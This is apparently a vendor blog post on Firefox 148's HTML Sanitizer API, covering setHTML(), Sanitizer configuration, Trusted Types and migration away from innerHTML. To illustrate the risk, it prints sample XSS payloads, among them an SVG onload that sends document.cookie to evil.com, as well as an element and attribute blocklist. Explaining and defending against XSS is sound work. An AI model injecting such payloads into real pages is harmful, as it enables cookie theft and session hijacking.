opdeck / blog / stronger-xss-protection-firefox-148

Goodbye innerHTML: How Firefox 148's Sanitizer API Boosts XSS Protection

February 24, 2026 / OpDeck Team
XSS ProtectionHTML SanitizerFirefox 148Web SecurityAPI Features

Cross-site scripting has haunted the web for decades, yet it stubbornly refuses to die. Now, with Firefox 148 shipping the first standardized implementation of the HTML Sanitizer API, the browser itself is finally stepping up to be a first-class partner in the fight against XSS. The introduction of setHTML() as a safe, native replacement for innerHTML is a watershed moment for web security — and every developer building dynamic web applications needs to understand what it means for their code today.

The Stubborn Persistence of XSS

Before diving into the new API, it's worth confronting an uncomfortable truth: XSS is not a solved problem. Not even close.

According to MITRE's 2025 list of the top 25 most dangerous software vulnerabilities, cross-site scripting kept the top spot, followed by SQL injection and cross-site request forgery. This isn't a new development — XSS has been a perennial threat for years. In H1 2025, the top five weakness types by CWE classification were led by Cross-Site Scripting, which still appeared more than any other, enabling attackers to inject malicious scripts into web pages.

The scale of the problem is staggering. Between July 2024 and July 2025, XSS vulnerabilities accounted for 15% of all "Important" or "Critical" security cases handled by the Microsoft Security Response Center (MSRC). Since January 2024, the MSRC has mitigated more than 970 XSS cases, demonstrating the consistent effort required to manage this vulnerability class. And results from 2025 identified over 6,227 XSS vulnerabilities in web applications.

Why does XSS persist so stubbornly? Cross-site scripting vulnerabilities are one of the most common online application security concerns, in part because they are easy to introduce but hard to discover and fix — meaning there's always the danger that they'll get into production code. The root cause is almost always the same: web applications often need to work with untrusted HTML on the client side, for example as part of a client-side templating solution, when rendering user-generated content, or if including data from another site — and injecting untrusted HTML can make a site vulnerable to various types of attacks, particularly XSS attacks that work by injecting untrusted HTML into the DOM that then executes JavaScript in the context of the current origin.

The innerHTML Problem: A Familiar Danger

For most web developers, the gateway to XSS is a deceptively simple property: innerHTML. The innerHTML property is probably the most common vector for cross-site scripting attacks, where potentially unsafe strings provided by a user are injected into the DOM without first being sanitized. While the property does prevent <script> elements from executing when they are injected, it is susceptible to many other ways that attackers can craft HTML to run malicious JavaScript.

Consider a scenario where you're building a comment system or a rich-text editor. A user submits some HTML-formatted text, and you want to display it on the page. The naive approach looks like this:

// ⚠️ DANGEROUS — never do this with untrusted input
document.getElementById('comment').innerHTML = userProvidedContent;

Even if you think you've blocked <script> tags, attackers have an arsenal of vectors at their disposal:

<!-- Event handler injection -->
<img src="x" onerror="stealCookies()">

<!-- JavaScript URI in anchor tags -->
<a href="javascript:alert(document.cookie)">Click me</a>

<!-- SVG-based payloads -->
<svg onload="fetch('https://evil.com/?c='+document.cookie)">

The innerHTML property allows any HTML string and is prone to XSS payloads — hence why the setHTML method accepts a sanitizer instance and sanitizes potentially harmful HTML content before injecting new nodes into the DOM.

The Third-Party Library Era: DOMPurify and Its Limits

The web development community's response to this problem has been to reach for third-party libraries. Libraries like DOMPurify have been the go-to solution — but now browsers can handle this natively. DOMPurify is excellent, but it comes with inherent limitations that the native Sanitizer API is designed to overcome.

Libraries like DOMPurify attempt to manage the XSS problem by carefully parsing and sanitizing strings before insertion, by constructing a DOM and filtering its members through an allow-list. This has proven to be a fragile approach, as the parsing APIs exposed to the web don't always map in reasonable ways to the browser's behavior when actually rendering a string as HTML in the "real" DOM. Moreover, these libraries need to keep on top of browsers' changing behavior over time; things that once were safe may turn into time-bombs based on new platform-level features.

This fragility has been demonstrated in practice. Researchers have documented how certain DOMPurify configurations can lead to mutation XSS (mXSS) — a particularly nasty class of attack where the browser's HTML parser mutates a sanitized string back into something dangerous. Certain configurations of DOMPurify can lead to a downgrade in sanitization protection, resulting in a full bypass even in the latest version.

Additionally, third-party libraries add bundle size, require version management, and depend on the library authors staying ahead of new browser quirks. Prior to the Sanitizer API, developers typically filtered input strings using third-party libraries such as DOMPurify. These should not be necessary when using the safe HTML sanitization methods, as the API is integrated with the browser and is more aware of the parsing context and what code is allowed to execute than external parser libraries can be.

Enter the Sanitizer API: Native XSS Protection in Firefox 148

The new standardized Sanitizer API provides a straightforward way for web developers to sanitize untrusted HTML before inserting it into the DOM. Firefox 148 is the first browser to ship this standardized security-enhancing API, advancing a safer web for everyone — and other browsers are expected to follow soon.

The main APIs are the Sanitizer constructor, to store configuration, and the Element.setHTML() and Document.parseHTML() functions.

How setHTML() Works

The element.setHTML() method enables developers to insert HTML content similarly to element.innerHTML, but without the security vulnerabilities such as cross-site scripting. The setHTML() method integrates sanitization directly into HTML insertion, providing safety by default.

The most basic usage is a true drop-in replacement for innerHTML:

// ✅ SAFE — XSS-unsafe content is automatically stripped
const target = document.getElementById('comment');
target.setHTML(userProvidedContent);

The browser automatically strips out dangerous elements like <script>, event handlers like onclick, and other XSS vectors.

Here's a concrete example of what gets sanitized:

const untrustedHTML = `
  <h1>Hello!</h1>
  <img src="x" onerror="stealCookies()">
  <script>alert('XSS')<\/script>
  <a href="javascript:void(0)" onclick="attack()">Click me</a>
  <p>This paragraph is safe.</p>
`;

document.getElementById('output').setHTML(untrustedHTML);
// Result: <h1>Hello!</h1><img src="x"><a>Click me</a><p>This paragraph is safe.</p>
// The onerror, onclick, and script are all stripped automatically

The default Sanitizer allows only XSS-safe input by default, omitting elements such as <script>, <frame>, <iframe>, <object>, <use>, and event handler attributes from their respective allow lists, and disallowing data attributes and comments. It is created if "default" or no object is passed to the constructor.

The Sanitizer Class: Configurable, Reusable Protection

For use cases that require more fine-grained control, the API provides the Sanitizer constructor. The Sanitizer interface defines a configuration object that specifies what elements, attributes, and comments are allowed or should be removed when inserting strings of HTML into an Element or ShadowRoot, or when parsing an HTML string into a Document.

You can configure the sanitizer in two modes: an allowlist approach (specify what's permitted) or a blocklist approach (specify what to remove).

Allowlist example — only permit specific elements:

// Only allow formatted text elements
const strictSanitizer = new Sanitizer({
  elements: ["p", "strong", "em", "b", "i", "ul", "ol", "li", "br"]
});

document.getElementById('output').setHTML(userContent, {
  sanitizer: strictSanitizer
});

Blocklist example — remove specific dangerous elements while allowing everything else:

// Start permissive, but block specific dangerous elements
const permissiveSanitizer = new Sanitizer({
  removeElements: ["script", "iframe", "object", "embed"],
  removeAttributes: ["onclick", "onerror", "onload", "onmouseover"]
});

document.getElementById('output').setHTML(userContent, {
  sanitizer: permissiveSanitizer
});

Per-element attribute control — fine-grained attribute rules:

// Allow h1 and h2, but control which attributes each can have
const precisionSanitizer = new Sanitizer({
  elements: [
    { name: "h1", attributes: [] },           // h1 gets no attributes
    { name: "h2", attributes: ["style"] },    // h2 can have style
    { name: "a", attributes: ["href"] },      // anchor only gets href
    "p", "strong", "em"
  ]
});

If the default configuration of setHTML() is too strict (or not strict enough) for a given use case, developers can provide a custom configuration that defines which HTML elements and attributes should be kept or removed.

One critical guarantee that sets the native API apart from libraries: the goal of the Sanitizer API is to ensure that "no matter how you use it or configure it, XSS will not occur" — which is both an advantage and a disadvantage. Even if you configure a custom sanitizer that explicitly allows a <script> element, the setHTML() method will still strip it. The browser enforces safety at the platform level, not just the library level.

Document.parseHTML(): Parsing Without Insertion

Beyond setHTML(), the API also introduces Document.parseHTML() for cases where you need to parse and sanitize HTML without immediately inserting it into the DOM.

Document.parseHTML() is an XSS-safe method to parse and sanitize a string of HTML in order to create a new Document instance.

// Parse and sanitize without inserting into the DOM
const safeDocument = Document.parseHTML(untrustedHTML);

// Now you can inspect, manipulate, or selectively use the parsed content
const headings = safeDocument.querySelectorAll('h1, h2, h3');
headings.forEach(heading => {
  // Work with sanitized content safely
  console.log(heading.textContent);
});

The safe methods are Element.setHTML(), ShadowRoot.setHTML(), and Document.parseHTML(). The unsafe variants — Element.setHTMLUnsafe(), ShadowRoot.setHTMLUnsafe(), and Document.parseHTMLUnsafe() — also exist for cases where you need to inject trusted HTML that includes declarative shadow DOM or other intentionally "unsafe" constructs.

Combining the Sanitizer API with Trusted Types

For teams that want the strongest possible XSS protection, the Sanitizer API is designed to work in concert with the Trusted Types API.

Trusted Types and the Sanitizer API share a common goal: preventing cross-site scripting. The two APIs complement each other: while the Sanitizer API provides a safe way to construct DOM trees, the Trusted Types API enforces that only sanitized content can be passed into unsafe DOM sinks, ensuring no developer can accidentally introduce XSS vulnerabilities into your codebase.

The Sanitizer API can be combined with Trusted Types, which centralize control over HTML parsing and injection. Once setHTML() is adopted, sites can enable Trusted Types enforcement more easily, often without requiring complex custom policies. A strict policy can allow setHTML() while blocking other unsafe HTML insertion methods, helping prevent future XSS regressions.

To enable Trusted Types, you set the appropriate Content Security Policy header:

Content-Security-Policy: require-trusted-types-for 'script'; trusted-types my-policy

The setHTML() and Document.parseHTML() are not unsafe sinks and will not cause an error when Trusted Types is enabled — you pass them strings, not TrustedHTML objects. This means migrating to setHTML() actually reduces the complexity of your Trusted Types implementation, since you have fewer unsafe sinks to wrap.

Migration Guide: Replacing innerHTML in Your Codebase

Migrating from innerHTML to setHTML() is intentionally straightforward for most use cases. Developers can opt into stronger XSS protections with minimal code changes by replacing error-prone innerHTML assignments with setHTML().

Step 1: Feature Detection and Progressive Enhancement

Since Firefox 148 is the first browser to ship this API, you'll need a fallback strategy for other browsers. Check for support with if ('Sanitizer' in window) and fall back to DOMPurify or another library.

function safeSetHTML(element, htmlString, sanitizerConfig = null) {
  if ('setHTML' in element) {
    // Native Sanitizer API — Firefox 148+ and future browsers
    const options = sanitizerConfig ? { sanitizer: sanitizerConfig } : {};
    element.setHTML(htmlString, options);
  } else {
    // Fallback for browsers without Sanitizer API support
    // Use DOMPurify as a polyfill
    element.innerHTML = DOMPurify.sanitize(htmlString);
  }
}

// Usage
const target = document.getElementById('content');
safeSetHTML(target, userProvidedHTML);

Step 2: Audit Your innerHTML Usage

Run a search across your codebase for all innerHTML assignments. Tools like ESLint with the no-unsanitized plugin can help automate this. For each occurrence, ask:

  1. Is the content user-provided or from an external source? → Replace with setHTML()
  2. Is the content purely from your own trusted server templates? → Consider setHTMLUnsafe() with a sanitizer, or keep innerHTML with a comment explaining why it's trusted
  3. Is the content plain text only? → Replace with textContent (no sanitization overhead needed at all)

Step 3: Handle React's dangerouslySetInnerHTML

React developers face a slightly different challenge. React developers often tend to use the sanitize-html library and React's dangerouslySetInnerHTML prop for rendering unsafe HTML strings to DOM. However, if the Sanitizer API becomes a browser standard, React will be able to offer a developer-friendly method to sanitize and inject arbitrary HTML strings without affecting bundle size.

In the meantime, you can create a utility component that uses the native API when available:

import { useEffect, useRef } from 'react';
import DOMPurify from 'dompurify';

function SafeHTML({ html, sanitizerConfig }) {
  const ref = useRef(null);

  useEffect(() => {
    if (!ref.current) return;

    if ('setHTML' in ref.current) {
      const options = sanitizerConfig ? { sanitizer: sanitizerConfig } : {};
      ref.current.setHTML(html, options);
    } else {
      // DOMPurify fallback
      ref.current.innerHTML = DOMPurify.sanitize(html);
    }
  }, [html, sanitizerConfig]);

  return <div ref={ref} />;
}

// Usage
<SafeHTML html={userGeneratedContent} />

Step 4: Watch Out for mXSS with Serialization

One important caveat: the Sanitizer API is not directly affected by mutated XSS. However, if a developer were to retrieve a sanitized node tree as a string via .innerHTML and then parse it again, mutated XSS may occur — a practice the specification explicitly discourages.

In other words, don't do this:

// ⚠️ Anti-pattern — re-serializing a sanitized DOM tree
element.setHTML(untrustedHTML);
const serialized = element.innerHTML; // Serialize back to string
anotherElement.innerHTML = serialized; // Re-inject — potential mXSS!

Instead, work with the DOM nodes directly rather than serializing back to strings.

Browser Support and the Road Ahead

The Sanitizer API is supported in Firefox Nightly, in line with the latest specification. It is available in Chrome Canary behind a flag. While Safari has not started implementation work, the Safari team does have a positive position on the API.

To experiment with the Sanitizer API before introducing it on a web page, Mozilla recommends exploring the Sanitizer API playground at sanitizer-api.dev.

The cross-browser story will improve. The specification has been in active development with positive engagement from engineers across all three browser engines, and is tracked as a stage 2 proposal for upstreaming into the WHATWG HTML standard.

Security Headers Still Matter: A Layered Defense

The Sanitizer API is a powerful tool, but it's not a silver bullet. Firefox has been deeply involved in solutions for XSS from the beginning, starting with spearheading the Content-Security-Policy standard in 2009. CSP allows websites to restrict which resources — scripts, styles, images, etc. — the browser can load and execute, providing a strong line of defense against XSS.

However, despite a steady stream of improvements and ongoing maintenance, CSP did not gain sufficient adoption to protect the long tail of the web, as it requires significant architectural changes for existing websites and continuous review by security experts. The Sanitizer API is designed to help fill that gap by providing a standardized way to turn malicious HTML into harmless HTML.

This means the best security posture combines both approaches:

  • setHTML() / Sanitizer API — prevents XSS at the point of DOM injection
  • Content-Security-Policy — provides a network-level backstop if injection still occurs
  • Trusted Types — enforces that all DOM sinks go through sanitization
  • Input validation — server-side validation as the first line of defense

You can audit your current security header posture using OpDeck's Vulnerability Scanner, which checks for missing or misconfigured security headers including CSP, and the SSL Certificate Checker to ensure your transport layer is properly secured. For a broader view of how your site performs and what technologies are in play, the Website Performance Analyzer and Tech Stack Detector can help you understand your full attack surface.

Also worth noting: one of the most striking findings from security assessments in 2025 was the continued struggle with HTTP security headers — particularly Content Security Policy and HTTP Strict Transport Security. Despite both mechanisms being well established for over a decade, they remain among the most misunderstood and inconsistently implemented security controls. Almost half of tested applications (43%) had no CSP header defined at all, and an additional 19% had a CSP in place that was overly permissive or fundamentally weak.

What This Means for the Web Platform

Firefox 148's shipping of the Sanitizer API is more than just a new browser feature — it represents a philosophical shift in how the web platform approaches security. Rather than leaving sanitization to individual developers or third-party libraries, the browser itself is now a first-class participant in keeping users safe.

The browser has a fairly good idea of when it is going to execute code. We can improve upon user-space libraries by teaching the browser how to render HTML from an arbitrary string in a safe manner, and do so in a way that is much more likely to be maintained and updated along with the browser's own changing parser implementation.

This is the key insight: a browser-native sanitizer will always be in sync with the browser's own parser. When a new HTML feature is added that could create a new XSS vector, the browser's sanitizer can be updated simultaneously. External libraries, no matter how well maintained, are always playing catch-up.

Once browser support for the Sanitizer API improves, there will be no need for third-party tools like DOMPurify in most cases. The createHTML boilerplate will be avoidable as you can simply use setHTML() instead.

Conclusion

The arrival of setHTML() and the Sanitizer API in Firefox 148 is one of the most meaningful security improvements the web platform has seen in years. The Sanitizer API enables an easy replacement of innerHTML assignments with setHTML() in existing code, introducing a new safer default to protect users from XSS attacks on the web. For the first time, developers have a standardized, browser-native, zero-dependency way to safely inject untrusted HTML — and the security guarantee is stronger than any library can provide.

The migration path is clear: start using feature detection today, adopt setHTML() wherever you're currently using innerHTML with user-provided content, and layer it with CSP and Trusted Types for defense in depth. As Chrome and Safari follow Firefox's lead, the Sanitizer API will become the new baseline for safe DOM manipulation across the entire web.

Now is the time to audit your codebase. Search for every innerHTML assignment, every dangerouslySetInnerHTML in your React components, and every place you're trusting a third-party library to stand between your users and attackers. Then start replacing them.


Ready to assess your site's security posture? Use OpDeck's Vulnerability Scanner to check your security headers, identify XSS-related misconfigurations, and get actionable recommendations — all in seconds, without installing anything. Pair it with the SEO Audit and Website Performance Analyzer to get a complete picture of your site's health. Security and performance go hand in hand — OpDeck helps you stay on top of both.